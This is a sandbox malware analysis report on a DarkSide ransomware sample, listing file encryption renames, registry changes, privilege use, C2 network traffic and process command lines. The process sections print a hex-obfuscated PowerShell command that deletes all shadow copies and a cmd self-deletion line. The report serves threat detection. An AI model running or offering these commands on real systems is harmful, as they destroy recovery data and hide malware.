Malware Analysis Report

2024-10-16 03:29

Sample ID 210518-trhasvtxns
Target 151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5
SHA256 151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5
Tags
darkside ransomware spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5

Threat Level: Known bad

The file 151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5 was found to be: Known bad.

Malicious Activity Summary

darkside ransomware spyware stealer

DarkSide

Modifies extensions of user files

Deletes itself

Reads user/profile data of web browsers

Sets desktop wallpaper using registry

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Modifies registry class

Suspicious use of WriteProcessMemory

Modifies Control Panel

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2021-05-18 20:48

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2021-05-18 20:48

Reported

2021-05-18 20:51

Platform

win10v20210410

Max time kernel

137s

Max time network

143s

Command Line

"C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe"

Signatures

DarkSide

ransomware darkside

Modifies extensions of user files

ransomware
Description Indicator Process Target
File opened for modification C:\Users\Admin\Pictures\FindShow.tiff.7b336f65 C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
File opened for modification C:\Users\Admin\Pictures\OptimizeReset.tiff C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
File renamed C:\Users\Admin\Pictures\StopUndo.raw => C:\Users\Admin\Pictures\StopUndo.raw.7b336f65 C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
File renamed C:\Users\Admin\Pictures\SwitchSkip.raw => C:\Users\Admin\Pictures\SwitchSkip.raw.7b336f65 C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
File opened for modification C:\Users\Admin\Pictures\SwitchSkip.raw.7b336f65 C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
File opened for modification C:\Users\Admin\Pictures\WatchUnprotect.png.7b336f65 C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
File opened for modification C:\Users\Admin\Pictures\ReceiveReset.raw.7b336f65 C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
File renamed C:\Users\Admin\Pictures\WatchUnprotect.png => C:\Users\Admin\Pictures\WatchUnprotect.png.7b336f65 C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
File renamed C:\Users\Admin\Pictures\AssertBlock.tiff => C:\Users\Admin\Pictures\AssertBlock.tiff.7b336f65 C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
File opened for modification C:\Users\Admin\Pictures\FindShow.tiff C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
File renamed C:\Users\Admin\Pictures\FindShow.tiff => C:\Users\Admin\Pictures\FindShow.tiff.7b336f65 C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
File renamed C:\Users\Admin\Pictures\OptimizeReset.tiff => C:\Users\Admin\Pictures\OptimizeReset.tiff.7b336f65 C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
File opened for modification C:\Users\Admin\Pictures\OptimizeReset.tiff.7b336f65 C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
File renamed C:\Users\Admin\Pictures\ReceiveReset.raw => C:\Users\Admin\Pictures\ReceiveReset.raw.7b336f65 C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
File opened for modification C:\Users\Admin\Pictures\AssertBlock.tiff.7b336f65 C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
File opened for modification C:\Users\Admin\Pictures\PopInstall.crw.7b336f65 C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
File opened for modification C:\Users\Admin\Pictures\AssertBlock.tiff C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
File renamed C:\Users\Admin\Pictures\PopInstall.crw => C:\Users\Admin\Pictures\PopInstall.crw.7b336f65 C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
File opened for modification C:\Users\Admin\Pictures\StopUndo.raw.7b336f65 C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A

Reads user/profile data of web browsers

spyware stealer

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\7b336f65.BMP" C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\7b336f65.BMP" C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A

Enumerates physical storage devices

Modifies Control Panel

evasion
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\Desktop\WallpaperStyle = "10" C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.7b336f65 C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.7b336f65\ = "7b336f65" C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\7b336f65\DefaultIcon C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\7b336f65 C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\7b336f65\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\7b336f65.ico" C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
Token: 36 N/A C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe

"C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C DEL /F /Q C:\Users\Admin\AppData\Local\Temp\151FBD~1.EXE >> NUL

Network

Country Destination Domain Proto
N/A 8.8.8.8:53 securebestapp20.com udp
N/A 185.105.109.19:443 securebestapp20.com tcp
N/A 8.8.8.8:53 23.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 13.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 22.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 20.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 18.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 16.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 15.0.10.10.in-addr.arpa udp
N/A 10.10.0.18:5355 udp
N/A 10.10.0.23:5355 udp
N/A 8.8.8.8:53 14.0.10.10.in-addr.arpa udp
N/A 10.10.0.20:5355 udp
N/A 10.10.0.22:5355 udp
N/A 8.8.8.8:53 12.0.10.10.in-addr.arpa udp
N/A 10.10.0.14:5355 udp
N/A 8.8.8.8:53 40.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 41.0.10.10.in-addr.arpa udp
N/A 10.10.0.15:5355 udp
N/A 10.10.0.12:5355 udp
N/A 8.8.8.8:53 1.0.10.10.in-addr.arpa udp
N/A 10.10.0.13:5355 udp
N/A 10.10.0.16:5355 udp
N/A 8.8.8.8:53 29.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 31.0.10.10.in-addr.arpa udp
N/A 10.10.0.41:5355 udp
N/A 8.8.8.8:53 32.0.10.10.in-addr.arpa udp
N/A 10.10.0.40:5355 udp
N/A 10.10.0.29:5355 udp
N/A 8.8.8.8:53 35.0.10.10.in-addr.arpa udp
N/A 10.10.0.31:5355 udp
N/A 10.10.0.32:5355 udp
N/A 185.105.109.19:443 securebestapp20.com tcp

Files

memory/2152-114-0x0000000000000000-mapping.dmp

memory/2152-120-0x00000188ED380000-0x00000188ED381000-memory.dmp

memory/2152-125-0x00000188ED530000-0x00000188ED531000-memory.dmp

memory/2152-131-0x00000188E9633000-0x00000188E9635000-memory.dmp

memory/2152-130-0x00000188E9630000-0x00000188E9632000-memory.dmp

memory/2152-132-0x00000188E9636000-0x00000188E9638000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 ea6243fdb2bfcca2211884b0a21a0afc
SHA1 2eee5232ca6acc33c3e7de03900e890f4adf0f2f
SHA256 5bc7d9831ea72687c5458cae6ae4eb7ab92975334861e08065242e689c1a1ba8
SHA512 189db6779483e5be80331b2b64e17b328ead5e750482086f3fe4baae315d47d207d88082b323a6eb777f2f47e29cac40f37dda1400462322255849cbcc973940

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0c2d3bf4ba8eb3735234f262ae3bddc5
SHA1 997f7a1adf15a0c0982a5a37f0c83129b655c51d
SHA256 e6548f346089f0597561abe61ebfd2d7a218ff647478c75896a009ec44d606c1
SHA512 032a645383358790fbfd0c95767f22a1a027a291298ac51d6d9d404c3e3a40f4fede9aff92f7e9a71e28831a6ecb278be04130c893f20ef17ea016dd967337f0

memory/4816-144-0x0000000000000000-mapping.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2021-05-18 20:48

Reported

2021-05-18 20:51

Platform

win7v20210410

Max time kernel

74s

Max time network

65s

Command Line

"C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe"

Signatures

DarkSide

ransomware darkside

Modifies extensions of user files

ransomware
Description Indicator Process Target
File opened for modification C:\Users\Admin\Pictures\MergeUpdate.tiff C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
File renamed C:\Users\Admin\Pictures\MergeUpdate.tiff => C:\Users\Admin\Pictures\MergeUpdate.tiff.341d6443 C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
File opened for modification C:\Users\Admin\Pictures\MergeUpdate.tiff.341d6443 C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
File renamed C:\Users\Admin\Pictures\RevokeEnter.crw => C:\Users\Admin\Pictures\RevokeEnter.crw.341d6443 C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
File opened for modification C:\Users\Admin\Pictures\RevokeEnter.crw.341d6443 C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
File renamed C:\Users\Admin\Pictures\UnblockComplete.crw => C:\Users\Admin\Pictures\UnblockComplete.crw.341d6443 C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
File opened for modification C:\Users\Admin\Pictures\UnblockComplete.crw.341d6443 C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Reads user/profile data of web browsers

spyware stealer

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\341d6443.BMP" C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\341d6443.BMP" C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A

Enumerates physical storage devices

Modifies Control Panel

evasion
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Control Panel\Desktop\WallpaperStyle = "10" C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.341d6443 C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.341d6443\ = "341d6443" C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\341d6443\DefaultIcon C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\341d6443 C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\341d6443\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\341d6443.ico" C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2040 wrote to memory of 888 N/A C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2040 wrote to memory of 888 N/A C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2040 wrote to memory of 888 N/A C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2040 wrote to memory of 888 N/A C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2040 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe C:\Windows\SysWOW64\cmd.exe
PID 2040 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe C:\Windows\SysWOW64\cmd.exe
PID 2040 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe C:\Windows\SysWOW64\cmd.exe
PID 2040 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe

"C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C DEL /F /Q C:\Users\Admin\AppData\Local\Temp\151FBD~1.EXE >> NUL

Network

Country Destination Domain Proto
N/A 8.8.8.8:53 securebestapp20.com udp
N/A 185.105.109.19:443 securebestapp20.com tcp
N/A 8.8.8.8:53 16.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 33.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 25.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 14.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 27.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 1.0.7.10.in-addr.arpa udp
N/A 10.7.0.16:5355 udp
N/A 10.7.0.14:5355 udp
N/A 8.8.8.8:53 18.0.7.10.in-addr.arpa udp
N/A 10.7.0.33:5355 udp
N/A 8.8.8.8:53 31.0.7.10.in-addr.arpa udp
N/A 10.7.0.18:5355 udp
N/A 8.8.8.8:53 23.0.7.10.in-addr.arpa udp
N/A 10.7.0.27:5355 udp
N/A 8.8.8.8:53 10.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 15.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 28.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 20.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 13.0.7.10.in-addr.arpa udp
N/A 10.7.0.31:5355 udp
N/A 10.7.0.20:5355 udp
N/A 10.7.0.28:5355 udp
N/A 10.7.0.13:5355 udp
N/A 10.7.0.23:5355 udp
N/A 10.7.0.15:5355 udp
N/A 10.7.0.25:5355 udp
N/A 10.7.0.10:5355 udp
N/A 185.105.109.19:443 securebestapp20.com tcp

Files

memory/2040-60-0x0000000076281000-0x0000000076283000-memory.dmp

memory/888-61-0x0000000000000000-mapping.dmp

memory/888-62-0x000007FEFC141000-0x000007FEFC143000-memory.dmp

memory/888-63-0x0000000002520000-0x0000000002521000-memory.dmp

memory/888-64-0x000000001AAC0000-0x000000001AAC1000-memory.dmp

memory/888-65-0x0000000002560000-0x0000000002561000-memory.dmp

memory/888-66-0x0000000002370000-0x0000000002371000-memory.dmp

memory/888-67-0x000000001AA40000-0x000000001AA42000-memory.dmp

memory/888-68-0x000000001AA44000-0x000000001AA46000-memory.dmp

memory/888-69-0x000000001C5A0000-0x000000001C5A1000-memory.dmp

memory/888-70-0x000000001B4D0000-0x000000001B4D1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

MD5 13ad95ada4f65a17d044d047d9fd1570
SHA1 3cab7b08dd95a2123ec628a2eb60cdc41472dd51
SHA256 1e3f7b2b9f5b3f03030a51a17b9a9e68fd309fec3221fa901ccbc391bf51d582
SHA512 936db0759eaed1c1e41147a85c3f772a7575f65c3eb02ddadc609a4bacd86b99112bf88e56c4105ce38f1ab36874812e3edaa5b1a36a910196b3b6dc0aeb7c47

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 0b176047694f22b25552fa6739bce32e
SHA1 03ff70b639bccc339714fe265e5b801d0733497d
